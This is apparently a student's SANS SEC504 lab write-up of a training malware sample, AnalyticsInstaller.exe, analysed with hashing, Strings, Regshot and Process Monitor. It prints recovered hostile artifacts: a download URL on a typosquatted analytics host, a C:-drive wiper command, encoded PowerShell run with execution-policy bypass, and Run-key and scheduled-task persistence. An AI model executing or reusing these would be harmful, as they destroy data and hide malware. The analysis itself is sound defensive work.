SEC504 - Hacker Tools, Techniques, and Incident Handling
Lab 1.3 - Malware Analysis: AnalyticsInstaller.exe
Solo, Lab
Focus: Malware Analysis
Level: SEC504
Date: May 2026
Artifacts: Sanitized PowerShell, Sysinternals Strings, Regshot, and Process Monitor screenshots from a SEC504 Windows analysis VM
TL;DR
- •Static pass: Get-FileHash for IOC pivoting, then Sysinternals Strings exposed a C2 URL, an HKCU Run key, an encoded PowerShell payload, and a wiper batch file (rd c:\ /s /q)
- •Dynamic pass: Regshot before/after diff surfaced a new 'Analytics Backup' scheduled-task registry key; Get-ScheduledTask confirmed it
- •Process Monitor process tree confirmed AnalyticsInstaller.exe spawning cmd.exe → powershell.exe -EncodedCommand at runtime
Skills demonstrated
Note: Course-provided PCAPs and lab instructions are not shared. Only my own captures and sanitized notes are published.
Why this matters
Most incident responders meet malware as a single unexplained binary on a single endpoint. The skill that matters is extracting maximum intelligence from that one file safely and quickly: a hash for threat-intel pivoting, strings for IOCs you can block today, and a controlled detonation that reveals persistence and child processes you would otherwise miss. This lab is the difference between 'we found a weird .exe' and 'here is its hash, its C2, its persistence mechanism, and the destructive payload it was staged to run.'
Context
This lab walks the SEC504 triage workflow for an unknown Windows binary (AnalyticsInstaller.exe) using a fast static pass followed by a controlled dynamic detonation. Static analysis fingerprints the file with a hash and pulls human-readable strings to surface embedded URLs, persistence paths, and an encoded PowerShell payload. Dynamic analysis uses Regshot to diff the registry before and after execution and Process Monitor to capture the live process tree, confirming that the installer drops a scheduled task and launches an encoded PowerShell child process.
Tools used
Steps taken
1Hash the sample
Started with the cheapest, safest evidence: a file hash. Get-FileHash produced an MD5 (5524BDF546472FD66D3450C39CC4E2E5) and SHA256 (D501EF28D4C3F3C308461E5FB51929E3875395C38E6A885692C8788A3C376E45) of AnalyticsInstaller.exe. A hash is the single most portable IOC, ready to drop into VirusTotal, an EDR block list, or a SIEM watchlist before the binary is ever executed.
$ Get-FileHash -Algorithm MD5 AnalyticsInstaller.exe
$ Get-FileHash -Algorithm SHA256 AnalyticsInstaller.exe-Algorithm MD5/SHA256choose the digestDefault outputAlgorithm, Hash, Path2Pull readable strings
Ran Sysinternals Strings (strings.exe -n 10) to dump ASCII and Unicode sequences of 10+ characters from the binary. Even without unpacking, the printable strings leaked the malware's intent in plain text: a C2 URL, a persistence path, and a base64 PowerShell blob.
$ C:\tools\Sysinternals\strings.exe -n 10 .\AnalyticsInstaller.exe-n 10minimum string length of 10 to cut noiseStrings dumps both ANSI and Unicode by default3Read the IOCs from the strings
The strings output was a confession. http://www1-google-analytics.com:8088/analytics.exe (a Google Analytics typosquat C2, the same disguise pattern seen in the RITA lab), C:\Windows\System32\analytics.exe (drop path), Software\Microsoft\Windows\CurrentVersion\Run with an 'Analytics Client' value (Run-key persistence), C:\Windows\System32\AnalyticsBackup.bat, a long powershell.exe -ExecutionPolicy Bypass -EncodedCommand JABt... blob, and cmd.exe /c start /max http://www.midnitemeerkats.com/note. Imported API names (RegOpenKeyExW, RegSetValueExW, RegCloseKey from ADVAPI32) confirmed the binary writes the registry itself.
4Regshot first shot
Switched to dynamic analysis. Regshot takes a full snapshot of the registry (and optionally the filesystem) so changes can be diffed after detonation. Configured it to scan C:\WINDOWS, output to the user profile, then captured the '1st shot' baseline: 395,525 keys and 676,926 values.
5Detonate and confirm the scheduled task
Ran AnalyticsInstaller.exe in the isolated VM, then immediately checked for a dropped scheduled task with Get-ScheduledTask. A new task appeared: TaskName 'Analytics Backup', State Ready. Scheduled tasks are a top-tier persistence and execution mechanism precisely because they survive reboots and run on a trigger.
$ .\AnalyticsInstaller.exe
$ Get-ScheduledTask6Regshot second shot
Took the Regshot '2nd shot' after detonation (67,014 keys / 77,922 values in the changed scope) so Regshot could diff the two snapshots. The before/after diff is what turns 'something changed' into a precise list of exactly which keys and values the malware touched.
7Compare the snapshots
Ran the Regshot comparison. The engine walked both snapshots and produced a diff report while the green progress bar ran. Comparing 395K-key baselines against the post-detonation state is exactly the kind of mechanical, high-coverage work that a human could never do by eye.
8Read the Regshot diff report
Opened the ~res-x64.txt diff. Keys added: 7, including the smoking gun HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Analytics Backup, alongside the matching Plain and Tasks TaskCache GUID entries. This is the registry footprint of the 'Analytics Backup' scheduled task confirmed independently of Get-ScheduledTask, plus the deleted keys/values from normal Windows churn (WER TermReason entries) that a responder learns to ignore.
9Read the dropped batch payload
Used Get-Content to read the dropped C:\Windows\SysWOW64\AnalyticsBackup.bat. Its entire contents: cmd.exe /c rd c:\ /s /q. That is a destructive wiper: a recursive, quiet, force delete of the C: drive. Naming a drive-wipe 'AnalyticsBackup' and scheduling it as 'Analytics Backup' is deliberate camouflage so a skimming defender reads 'backup' and moves on.
$ Get-Content C:\Windows\SysWOW64\AnalyticsBackup.bat10Filter Process Monitor
Launched Sysinternals Process Monitor and set a filter: Process Name is AnalyticsInstaller.exe → Include, with the usual analysis-tool noise (Procmon, Procexp, Autoruns, System) excluded. Filtering before detonation keeps the capture focused on the malware's own activity instead of the thousands of events Windows generates per second.
11Re-detonate under Procmon
Re-ran AnalyticsInstaller.exe with Process Monitor capturing. The filtered event stream records every file, registry, process, and network operation the binary performs, in order, with full detail.
$ .\AnalyticsInstaller.exe12Find the Process Create event
Used Procmon's Find (Ctrl+F) for 'Process Create' to jump straight to the moment the malware spawned a child process, skipping past the file and registry operations to the execution event that matters most.
13Read the encoded PowerShell command line
The Process Create event properties revealed the child: C:\WINDOWS\SysWOW64\cmd.exe launching cmd.exe /c powershell.exe -ExecutionPolicy Bypass -EncodedCommand AEkAZgBHAG8... The -EncodedCommand flag takes base64 so the real script never appears in plaintext on the command line, and -ExecutionPolicy Bypass sidesteps script restrictions. This is the runtime confirmation of the encoded blob seen statically in the strings.
14Reconstruct the process tree
Opened Procmon's Process Tree to see the full lineage: AnalyticsInstaller.exe (PID 5804), launched by powershell.exe under Explorer, started and exited within ~21 seconds. The tree ties the binary, its parent shell, and its short-lived execution window together into one picture, which is exactly what an IR timeline needs.
Key findings
Outcome / Lessons learned
Took an unknown Windows binary from 'unexplained .exe' to a full IOC and behavior profile in one sitting. Static analysis gave a hash, a typosquat C2 (www1-google-analytics.com:8088), Run-key persistence, and an encoded PowerShell payload. Dynamic analysis with Regshot proved the 'Analytics Backup' scheduled-task persistence at the registry level, Get-ScheduledTask confirmed the task, the dropped AnalyticsBackup.bat turned out to be a C:-drive wiper, and Process Monitor's process tree caught the cmd.exe → powershell.exe -EncodedCommand execution chain.
Push the SHA256 and the network IOCs (www1-google-analytics.com:8088, midnitemeerkats.com) to EDR block lists and the SIEM watchlist immediately. Hunt the fleet for the 'Analytics Backup' scheduled task, the HKCU/HKLM Run 'Analytics Client' value, and any analytics.exe / AnalyticsBackup.bat on disk. Decode the captured base64 -EncodedCommand offline to recover the real PowerShell stage. Given the wiper payload, prioritize containment over observation: isolate any host showing the persistence before the scheduled task fires.
Security controls relevant
- Application control / WDAC to block unsigned binaries from user-writable paths
- PowerShell script-block logging and transcription to capture decoded -EncodedCommand content
- Scheduled-task and Run-key baselining with alerting on new entries
- EDR detonation/behavioral detection for cmd.exe → powershell.exe -EncodedCommand chains
- Egress filtering and DNS monitoring for typosquatted analytics domains
- Tamper-resistant, offline backups to survive a destructive 'rd c:\ /s /q' payload
What I took away from this
Strings is the highest return-on-effort tool in malware triage and it is almost free. Before unpacking, before a sandbox, before a debugger, a thirty-second strings run on this sample handed over the C2 URL, the persistence path, the encoded payload, and the name of the wiper batch file. Plenty of commodity malware never bothers to encrypt its strings because authors assume nobody will look. Look first; you will often be done before the sandbox finishes booting.
Regshot is a poor man's EDR for a controlled detonation and it caught the persistence cleanly. Diffing a 395,000-key registry snapshot against the post-execution state is impossible by hand and trivial for the tool, and the 'Analytics Backup' TaskCache key fell straight out of the diff. The discipline that makes this work is taking the baseline before you detonate, every single time, because you only get one clean 'before.'
The naming was the most instructive part of this sample. 'AnalyticsInstaller', 'Analytics Client', 'Analytics Backup', a typosquat of Google Analytics for C2. Every artifact was named to read as benign telemetry, and the destructive wiper was filed under 'Backup', a word defenders associate with safety. Attackers optimize for the half-second a tired analyst spends reading a name. The defense is mechanical verification: read what the file actually does (rd c:\ /s /q), not what it is called.